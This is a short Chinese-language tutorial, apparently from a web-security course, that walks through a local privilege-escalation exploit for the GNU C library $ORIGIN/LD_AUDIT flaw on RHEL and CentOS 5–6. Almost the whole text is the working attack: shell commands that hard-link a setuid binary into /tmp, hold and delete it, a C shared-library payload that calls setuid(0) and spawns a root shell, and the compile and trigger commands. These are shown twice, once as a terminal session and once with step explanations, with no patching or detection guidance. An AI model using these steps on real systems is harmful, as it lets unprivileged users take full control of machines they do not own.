[原创]WEB安全第六章提权篇03 GNU C library 动态链接区 $ORIGIN 溢出提权

WEB安全第六章提权篇03 GNU C library 动态链接区 $ORIGIN 溢出提权

利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限

合适用 RHEL5-RHEL6 CENTOS5-CENTOS6 均可以提权

提权方法

[moonsec@localhost tmp]$ mkdir /tmp/exploit

[moonsec@localhost tmp]$ ln /bin/ping /tmp/exploit/target

[moonsec@localhost tmp]$ exec 3< /tmp/exploit/target

[moonsec@localhost tmp]$ ls -l /proc/$$/fd/3

lr-x—— 1 moonsec moonsec 64 Dec 19 06:10 /proc/2799/fd/3 -> /tmp/exploit/target

[moonsec@localhost tmp]$  rm -rf /tmp/exploit/

[moonsec@localhost tmp]$  ls -l /proc/$$/fd/3

lr-x—— 1 moonsec moonsec 64 Dec 19 06:10 /proc/2799/fd/3 -> /tmp/exploit/target (deleted)

[moonsec@localhost tmp]$ cat > payload.c -fa

[php]
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
[moonsec@localhost tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[moonsec@localhost tmp]$ ls -l /tmp/exploit
-rwxrwxr-x 1 moonsec moonsec 4223 Dec 19 06:10 /tmp/exploit
[moonsec@localhost tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
[root@localhost tmp]# whoami

[/php]

创建目录

mkdir /tmp/exploit

创建target文件硬链接

ln /bin/ping /tmp/exploit/target

把target文件加载到内存中

exec 3< /tmp/exploit/target

查看target在内存中的情况

ls -l /proc/$$/fd/3

删除目录

rm -rf /tmp/exploit/

输入c代码

cat > payload.c

void __attribute__((constructor)) init()

{

   setuid(0);

   system(“/bin/bash”);

}

编译文件

gcc -w -fPIC -shared -o /tmp/exploit payload.c

提升root权限

LD_AUDIT=”\$ORIGIN” exec /proc/self/fd/3

cetnots5.5 用户moonsec 提权到root权限